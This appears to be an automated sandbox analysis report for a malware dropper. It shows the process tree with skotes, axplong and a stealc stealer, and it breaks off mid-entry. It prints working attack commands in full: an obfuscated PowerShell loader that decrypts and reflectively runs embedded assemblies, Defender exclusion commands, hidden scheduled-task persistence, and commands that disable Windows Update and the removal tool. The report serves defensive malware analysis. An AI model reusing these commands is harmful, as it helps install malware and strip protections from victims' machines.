PID 4356 wrote to memory of 100	4356	axplong.exe	113
PID 524 wrote to memory of 5040	524	skotes.exe	114
PID 524 wrote to memory of 5040	524	skotes.exe	114
PID 524 wrote to memory of 5040	524	skotes.exe	114
PID 4356 wrote to memory of 4512	4356	axplong.exe	115
PID 4356 wrote to memory of 4512	4356	axplong.exe	115
PID 4356 wrote to memory of 4512	4356	axplong.exe	115
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 4512 wrote to memory of 2796	4512	alex2022.exe	117
PID 1584 wrote to memory of 1560	1584	powershell.exe	192
PID 1584 wrote to memory of 1560	1584	powershell.exe	192
PID 1584 wrote to memory of 1560	1584	powershell.exe	192
PID 4356 wrote to memory of 4488	4356	axplong.exe	154
PID 4356 wrote to memory of 4488	4356	axplong.exe	154
PID 4356 wrote to memory of 4488	4356	axplong.exe	154

C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
"C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3892
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
    "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\is-Q9JFD.tmp\stories.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-Q9JFD.tmp\stories.tmp" /SL5="$A008E,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause video_jet_1235
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:928
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause video_jet_1235
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2880
    - - C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe
        
        "C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd';$mlaR='InaHWTvaHWTokaHWTeaHWT'.Replace('aHWT', ''),'GoEqIetoEqICuoEqIrroEqIentoEqIProEqIooEqIcoEqIeoEqIssoEqI'.Replace('oEqI', ''),'ElcnPTemcnPTencnPTtAcnPTtcnPT'.Replace('cnPT', ''),'LVXBNoadVXBN'.Replace('VXBN', ''),'FrSQcEoSQcEmBSQcEaSQcEse6SQcE4SQcEStrSQcEinSQcEgSQcE'.Replace('SQcE', ''),'ChhnmsanhnmsghnmseExhnmstehnmsnsihnmsonhnms'.Replace('hnms', ''),'MOYmhaOYmhinMOYmhoduOYmhleOYmh'.Replace('OYmh', ''),'DezNFDcomzNFDpzNFDrezNFDsszNFD'.Replace('zNFD', ''),'RUdUPeaUdUPdLUdUPinUdUPesUdUP'.Replace('UdUP', ''),'EnXsXntXsXnrXsXnyPoXsXninXsXntXsXn'.Replace('XsXn', ''),'CrQiuaeQiuaateQiuaDeQiuacQiuarQiuaypQiuatQiuaorQiua'.Replace('Qiua', ''),'CopwpFTyTowpFT'.Replace('wpFT', ''),'SpzcNflizcNftzcNf'.Replace('zcNf', ''),'TZlhXrZlhXanZlhXsfoZlhXrZlhXmFZlhXinZlhXaZlhXlZlhXBlZlhXockZlhX'.Replace('ZlhX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($mlaR[1])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function xlgJw($THCaC){$tnIYs=[System.Security.Cryptography.Aes]::Create();$tnIYs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tnIYs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tnIYs.Key=[System.Convert]::($mlaR[4])('nn1oVgQf+vsVUwhFRI0DoffekxC7+zU06CysJKUG7/E=');$tnIYs.IV=[System.Convert]::($mlaR[4])('vS7iVHdVCr38C0HCS9OQuA==');$GnhUQ=$tnIYs.($mlaR[10])();$mheDM=$GnhUQ.($mlaR[13])($THCaC,0,$THCaC.Length);$GnhUQ.Dispose();$tnIYs.Dispose();$mheDM;}function uRupt($THCaC){$rILnk=New-Object System.IO.MemoryStream(,$THCaC);$mMQDJ=New-Object System.IO.MemoryStream;$xKbEF=New-Object System.IO.Compression.GZipStream($rILnk,[IO.Compression.CompressionMode]::($mlaR[7]));$xKbEF.($mlaR[11])($mMQDJ);$xKbEF.Dispose();$rILnk.Dispose();$mMQDJ.Dispose();$mMQDJ.ToArray();}$KWCnK=[System.IO.File]::($mlaR[8])([Console]::Title);$MFCGw=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 5).Substring(2))));$CAxSJ=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 6).Substring(2))));[System.Reflection.Assembly]::($mlaR[3])([byte[]]$CAxSJ).($mlaR[9]).($mlaR[0])($null,$null);[System.Reflection.Assembly]::($mlaR[3])([byte[]]$MFCGw).($mlaR[9]).($mlaR[0])($null,$null); "
      4⤵
      System Location Discovery: System Language Discovery
      PID:4968
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4788
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain')
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68997' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68997Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3800
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network68997Man.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1996
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network68997Man.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network68997Man.cmd';$mlaR='InaHWTvaHWTokaHWTeaHWT'.Replace('aHWT', ''),'GoEqIetoEqICuoEqIrroEqIentoEqIProEqIooEqIcoEqIeoEqIssoEqI'.Replace('oEqI', ''),'ElcnPTemcnPTencnPTtAcnPTtcnPT'.Replace('cnPT', ''),'LVXBNoadVXBN'.Replace('VXBN', ''),'FrSQcEoSQcEmBSQcEaSQcEse6SQcE4SQcEStrSQcEinSQcEgSQcE'.Replace('SQcE', ''),'ChhnmsanhnmsghnmseExhnmstehnmsnsihnmsonhnms'.Replace('hnms', ''),'MOYmhaOYmhinMOYmhoduOYmhleOYmh'.Replace('OYmh', ''),'DezNFDcomzNFDpzNFDrezNFDsszNFD'.Replace('zNFD', ''),'RUdUPeaUdUPdLUdUPinUdUPesUdUP'.Replace('UdUP', ''),'EnXsXntXsXnrXsXnyPoXsXninXsXntXsXn'.Replace('XsXn', ''),'CrQiuaeQiuaateQiuaDeQiuacQiuarQiuaypQiuatQiuaorQiua'.Replace('Qiua', ''),'CopwpFTyTowpFT'.Replace('wpFT', ''),'SpzcNflizcNftzcNf'.Replace('zcNf', ''),'TZlhXrZlhXanZlhXsfoZlhXrZlhXmFZlhXinZlhXaZlhXlZlhXBlZlhXockZlhX'.Replace('ZlhX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($mlaR[1])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function xlgJw($THCaC){$tnIYs=[System.Security.Cryptography.Aes]::Create();$tnIYs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tnIYs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tnIYs.Key=[System.Convert]::($mlaR[4])('nn1oVgQf+vsVUwhFRI0DoffekxC7+zU06CysJKUG7/E=');$tnIYs.IV=[System.Convert]::($mlaR[4])('vS7iVHdVCr38C0HCS9OQuA==');$GnhUQ=$tnIYs.($mlaR[10])();$mheDM=$GnhUQ.($mlaR[13])($THCaC,0,$THCaC.Length);$GnhUQ.Dispose();$tnIYs.Dispose();$mheDM;}function uRupt($THCaC){$rILnk=New-Object System.IO.MemoryStream(,$THCaC);$mMQDJ=New-Object System.IO.MemoryStream;$xKbEF=New-Object System.IO.Compression.GZipStream($rILnk,[IO.Compression.CompressionMode]::($mlaR[7]));$xKbEF.($mlaR[11])($mMQDJ);$xKbEF.Dispose();$rILnk.Dispose();$mMQDJ.Dispose();$mMQDJ.ToArray();}$KWCnK=[System.IO.File]::($mlaR[8])([Console]::Title);$MFCGw=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 5).Substring(2))));$CAxSJ=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 6).Substring(2))));[System.Reflection.Assembly]::($mlaR[3])([byte[]]$CAxSJ).($mlaR[9]).($mlaR[0])($null,$null);[System.Reflection.Assembly]::($mlaR[3])([byte[]]$MFCGw).($mlaR[9]).($mlaR[0])($null,$null); "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network68997Man')
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68997' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68997Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10002870121\WashingtonPark.cmd" "
        8⤵
        
        PID:6452
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\10002870121\WashingtonPark.cmd';$pGLu='SXFJvpliXFJvtXFJv'.Replace('XFJv', ''),'GekCldtkCldCukCldrrekCldnkCldtPrkCldockCldeskCldskCld'.Replace('kCld', ''),'MzhjOazhjOinzhjOModzhjOulzhjOezhjO'.Replace('zhjO', ''),'DeclhIWomlhIWplhIWrlhIWeslhIWslhIW'.Replace('lhIW', ''),'CreKnxraKnxrtKnxreDKnxrecKnxrrKnxrypKnxrtorKnxr'.Replace('Knxr', ''),'InSjCgvokSjCgeSjCg'.Replace('SjCg', ''),'EEIOMlEIOMeEIOMmeEIOMntEIOMAtEIOM'.Replace('EIOM', ''),'ChftpganftpggftpgeEftpgxftpgtftpgeftpgnsftpgioftpgnftpg'.Replace('ftpg', ''),'EnOKxGtOKxGryOKxGPoOKxGinOKxGtOKxG'.Replace('OKxG', ''),'TrswNsanswNssswNsfoswNsrswNsmFswNsiswNsnalswNsBloswNsckswNs'.Replace('swNs', ''),'FroMxsZmBMxsZaMxsZse6MxsZ4SMxsZtrMxsZinMxsZgMxsZ'.Replace('MxsZ', ''),'LxiuJoaxiuJdxiuJ'.Replace('xiuJ', ''),'CoSplEpySplEToSplE'.Replace('SplE', ''),'RVFlceadVFlcLiVFlcneVFlcsVFlc'.Replace('VFlc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($pGLu[1])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function GtDkE($AWtBQ){$WHTbz=[System.Security.Cryptography.Aes]::Create();$WHTbz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$WHTbz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$WHTbz.Key=[System.Convert]::($pGLu[10])('gY+ezlr9WHTABOauaOioO7DZdBT5INObKf99SU9P8mg=');$WHTbz.IV=[System.Convert]::($pGLu[10])('0w8zN4pMl/NYOp4GiZDCFQ==');$tvzUv=$WHTbz.($pGLu[4])();$nsVSR=$tvzUv.($pGLu[9])($AWtBQ,0,$AWtBQ.Length);$tvzUv.Dispose();$WHTbz.Dispose();$nsVSR;}function dIhdn($AWtBQ){$xHmPq=New-Object System.IO.MemoryStream(,$AWtBQ);$KNpmz=New-Object System.IO.MemoryStream;$DYrEB=New-Object System.IO.Compression.GZipStream($xHmPq,[IO.Compression.CompressionMode]::($pGLu[3]));$DYrEB.($pGLu[12])($KNpmz);$DYrEB.Dispose();$xHmPq.Dispose();$KNpmz.Dispose();$KNpmz.ToArray();}$NigVE=[System.IO.File]::($pGLu[13])([Console]::Title);$kJEwR=dIhdn (GtDkE ([Convert]::($pGLu[10])([System.Linq.Enumerable]::($pGLu[6])($NigVE, 5).Substring(2))));$CQRsz=dIhdn (GtDkE ([Convert]::($pGLu[10])([System.Linq.Enumerable]::($pGLu[6])($NigVE, 6).Substring(2))));[System.Reflection.Assembly]::($pGLu[11])([byte[]]$CQRsz).($pGLu[8]).($pGLu[5])($null,$null);[System.Reflection.Assembly]::($pGLu[11])([byte[]]$kJEwR).($pGLu[8]).($pGLu[5])($null,$null); "
        9⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        9⤵
        
        PID:348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\10002870121\WashingtonPark')
        10⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 94208' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network94208Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4644
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network94208Man.cmd"
        10⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network94208Man.cmd"
        11⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network94208Man.cmd';$pGLu='SXFJvpliXFJvtXFJv'.Replace('XFJv', ''),'GekCldtkCldCukCldrrekCldnkCldtPrkCldockCldeskCldskCld'.Replace('kCld', ''),'MzhjOazhjOinzhjOModzhjOulzhjOezhjO'.Replace('zhjO', ''),'DeclhIWomlhIWplhIWrlhIWeslhIWslhIW'.Replace('lhIW', ''),'CreKnxraKnxrtKnxreDKnxrecKnxrrKnxrypKnxrtorKnxr'.Replace('Knxr', ''),'InSjCgvokSjCgeSjCg'.Replace('SjCg', ''),'EEIOMlEIOMeEIOMmeEIOMntEIOMAtEIOM'.Replace('EIOM', ''),'ChftpganftpggftpgeEftpgxftpgtftpgeftpgnsftpgioftpgnftpg'.Replace('ftpg', ''),'EnOKxGtOKxGryOKxGPoOKxGinOKxGtOKxG'.Replace('OKxG', ''),'TrswNsanswNssswNsfoswNsrswNsmFswNsiswNsnalswNsBloswNsckswNs'.Replace('swNs', ''),'FroMxsZmBMxsZaMxsZse6MxsZ4SMxsZtrMxsZinMxsZgMxsZ'.Replace('MxsZ', ''),'LxiuJoaxiuJdxiuJ'.Replace('xiuJ', ''),'CoSplEpySplEToSplE'.Replace('SplE', ''),'RVFlceadVFlcLiVFlcneVFlcsVFlc'.Replace('VFlc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($pGLu[1])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function GtDkE($AWtBQ){$WHTbz=[System.Security.Cryptography.Aes]::Create();$WHTbz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$WHTbz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$WHTbz.Key=[System.Convert]::($pGLu[10])('gY+ezlr9WHTABOauaOioO7DZdBT5INObKf99SU9P8mg=');$WHTbz.IV=[System.Convert]::($pGLu[10])('0w8zN4pMl/NYOp4GiZDCFQ==');$tvzUv=$WHTbz.($pGLu[4])();$nsVSR=$tvzUv.($pGLu[9])($AWtBQ,0,$AWtBQ.Length);$tvzUv.Dispose();$WHTbz.Dispose();$nsVSR;}function dIhdn($AWtBQ){$xHmPq=New-Object System.IO.MemoryStream(,$AWtBQ);$KNpmz=New-Object System.IO.MemoryStream;$DYrEB=New-Object System.IO.Compression.GZipStream($xHmPq,[IO.Compression.CompressionMode]::($pGLu[3]));$DYrEB.($pGLu[12])($KNpmz);$DYrEB.Dispose();$xHmPq.Dispose();$KNpmz.Dispose();$KNpmz.ToArray();}$NigVE=[System.IO.File]::($pGLu[13])([Console]::Title);$kJEwR=dIhdn (GtDkE ([Convert]::($pGLu[10])([System.Linq.Enumerable]::($pGLu[6])($NigVE, 5).Substring(2))));$CQRsz=dIhdn (GtDkE ([Convert]::($pGLu[10])([System.Linq.Enumerable]::($pGLu[6])($NigVE, 6).Substring(2))));[System.Reflection.Assembly]::($pGLu[11])([byte[]]$CQRsz).($pGLu[8]).($pGLu[5])($null,$null);[System.Reflection.Assembly]::($pGLu[11])([byte[]]$kJEwR).($pGLu[8]).($pGLu[5])($null,$null); "
        12⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        12⤵
        
        PID:7056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network94208Man')
        13⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 94208' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network94208Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5668
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 2432
        13⤵
        Program crash
        
        PID:6416
- - C:\Users\Admin\AppData\Local\Temp\1011459001\309f071fed.exe
    "C:\Users\Admin\AppData\Local\Temp\1011459001\309f071fed.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4356
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:100
    - - C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4512
      - C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2796
    - - C:\Users\Admin\AppData\Local\Temp\1002824001\9e66340a0d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1002824001\9e66340a0d.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4488
    - - C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4944
      - C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
        7⤵
        Executes dropped EXE
        
        PID:4220
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:7028
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:4540
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:7024
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:3376
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:2672
        
        C:\Windows\system32\sc.exe
        
